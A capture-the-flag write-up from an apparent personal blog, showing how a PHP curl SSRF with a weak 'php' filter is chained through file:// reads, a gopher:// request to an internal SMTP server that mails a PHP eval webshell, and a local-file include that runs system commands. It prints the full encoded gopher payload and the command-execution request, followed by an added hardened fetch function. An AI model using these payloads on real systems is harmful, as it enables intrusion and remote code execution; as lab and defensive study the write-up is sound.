White's Blog.

Using a curl SSRF for SMTP log poisoning to get a shell

Word count: 567 | Reading time: 2 min
2019/11/01

Challenge

<?php
highlight_file(__FILE__);
$x = $_GET['x'];
$pos = strpos($x, "php");
if ($pos) {
exit("denied");
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$x");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$result = curl_exec($ch);
echo $result;
?>

Analysis:

In this challenge you can find that flag.php exists, so the first goal is to read the contents of the flag. curl's file:// protocol can read it. The contents of flag.php turn out to be `//there is no flag /etc/hosts`, so use the file protocol to view /etc/hosts, which reveals the web server's IP. Scanning the same subnet shows an internal host, 172.18.0.2, with port 80 open and port 25 open as well. Accessing 172.18.0.2 over curl's http protocol shows source code containing `include $_GET[a];`, so parameter a can be controlled to read arbitrary files. The postfix user in /etc/passwd shows that a mail system is set up on that host.

At this point, capture the traffic between a telnet session and the SMTP server, then replay it with the gopher protocol to send a PHP webshell to the server as a mail message; the message is delivered to the local mailbox file, which the include then reads. Note that the gopher payload in parameter x needs to be URL-encoded twice (the non-printable characters have already been URL-decoded once by the time the server receives them, and the PHP webshell in the mail body contains the string "php", which would be rejected by the filter if left unencoded). After that, commands can be executed to get the flag.

PHP mail webshell:

/?x=gopher://172.18.0.2:25/%5f%4d%41%49%4c%25%32%30%46%52%4f%4d%3a%77%68%69%74%65%25%34%30%64%64%34%30%38%38%32%62%61%30%65%61%25%30%41%52%43%50%54%25%32%30%54%6f%3a%77%77%77%2d%64%61%74%61%25%34%30%6c%6f%63%61%6c%68%6f%73%74%25%30%41%44%41%54%41%25%30%41%46%72%6f%6d%3a%77%68%69%74%65%25%34%30%64%64%34%30%38%38%32%62%61%30%65%61%25%30%41%53%75%62%6a%65%63%74%3a%77%68%69%74%65%25%30%41%4d%65%73%73%61%67%65%3a%25%33%63%25%33%66%25%37%30%25%36%38%25%37%30%25%32%30%25%36%35%25%37%36%25%36%31%25%36%63%25%32%38%25%32%34%25%35%66%25%34%37%25%34%35%25%35%34%25%35%62%25%37%37%25%36%38%25%36%39%25%37%34%25%36%35%25%35%64%25%32%39%25%33%62%25%32%30%25%33%66%25%33%65%25%30%41%2e

Reading the flag

/?x=http://172.18.0.2:80/?a=/var/spool/mail/www-data%26white=system('cat%2520/Th7s_Is_Flag');
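The whole chain works because the challenge hands any URL scheme to curl and its only filter is a substring check for "php". As an added example (not from the original post or the challenge), here is a hardened replacement for that fetch that allows only http/https, refuses hosts resolving to private or loopback addresses, and pins curl to the address it validated; `safe_fetch` is a name chosen for this example.

```php
<?php
// Added example, not from the original post: a hardened version of the
// challenge's fetch. Only http/https reach curl, so file:// and gopher://
// can no longer read local files or talk to the internal SMTP port.
function safe_fetch(string $url): string
{
    $p = parse_url($url);
    if ($p === false || !isset($p['scheme'], $p['host'])) {
        throw new InvalidArgumentException('malformed url');
    }
    $scheme = strtolower($p['scheme']);
    if (!in_array($scheme, ['http', 'https'], true)) {
        throw new InvalidArgumentException('only http/https allowed');
    }
    $host = $p['host'];
    $port = $p['port'] ?? ($scheme === 'https' ? 443 : 80);
    // Resolve once (IPv4 only; unresolvable or IPv6-only hosts are denied)
    // and reject 10/8, 172.16/12, 192.168/16, 127/8, 169.254/16, etc.
    $ips = gethostbynamel($host);
    if (!$ips) {
        throw new RuntimeException('cannot resolve host');
    }
    foreach ($ips as $ip) {
        if (!filter_var($ip, FILTER_VALIDATE_IP,
                FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
            throw new RuntimeException('host resolves to an internal address');
        }
    }
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER  => true,
        // Allow-list of schemes for the request and for any redirect target.
        CURLOPT_PROTOCOLS       => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_REDIR_PROTOCOLS => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        // A redirect to an internal host would bypass the checks above.
        CURLOPT_FOLLOWLOCATION  => false,
        // Pin curl to the address we validated so a second DNS lookup
        // (DNS rebinding) cannot swap in an internal address.
        CURLOPT_RESOLVE         => ["$host:$port:{$ips[0]}"],
        CURLOPT_TIMEOUT         => 10,
    ]);
    $body = curl_exec($ch);
    $err  = curl_error($ch);
    curl_close($ch);
    if ($body === false) {
        throw new RuntimeException("fetch failed: $err");
    }
    return $body;
}
```

With this in place, `?x=file:///etc/hosts` and `?x=gopher://172.18.0.2:25/...` are rejected before curl ever opens a connection, and an `http://` URL pointing at 172.18.0.2 fails the private-range check.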

Original author: White

Published: November 1st 2019, 12:58:49 pm

Updated: November 7th 2019, 1:00:12 pm
